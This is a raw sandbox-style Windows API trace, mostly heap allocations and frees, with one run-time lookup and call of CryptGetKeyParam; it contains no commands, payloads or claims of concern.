[0092.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0092.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.057] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0092.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0092.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0092.058] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0092.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0092.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0092.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0092.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0092.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0092.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0092.059] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0092.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0092.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0092.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0092.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0092.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0092.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0092.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0092.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0092.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0092.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0092.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0092.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0092.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0092.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0092.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0092.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0092.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0092.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0092.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0092.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0092.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0092.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0092.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0092.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0092.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0092.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0092.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0092.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0092.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0092.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0092.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0092.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0092.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0092.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0092.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0092.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0092.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0092.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0092.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0092.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0092.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0092.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0092.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0092.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0092.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0092.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0092.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0092.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0092.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0092.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0092.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0092.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0092.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0092.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0092.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0092.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0092.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0092.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0092.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0092.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0092.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0092.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0092.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0092.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0092.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0092.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0092.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796de8 [0092.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0092.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0092.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0092.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0092.065] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0092.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0092.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0092.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0092.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0092.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0092.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0092.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0092.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0092.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0092.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0092.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0092.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0092.065] CryptGetKeyParam (in: hKey=0x41abfc0, dwParam=0x7, pbData=0x43e2900, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2900*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0092.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0092.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0092.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0092.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0092.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0092.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0092.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0092.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0092.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0092.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0092.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0092.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0092.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0092.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0092.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0092.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0092.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0092.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0092.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0092.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0092.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0092.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0092.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0092.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0092.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0092.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0092.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0092.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0092.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0092.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0092.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0092.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0092.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0092.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0092.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0092.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 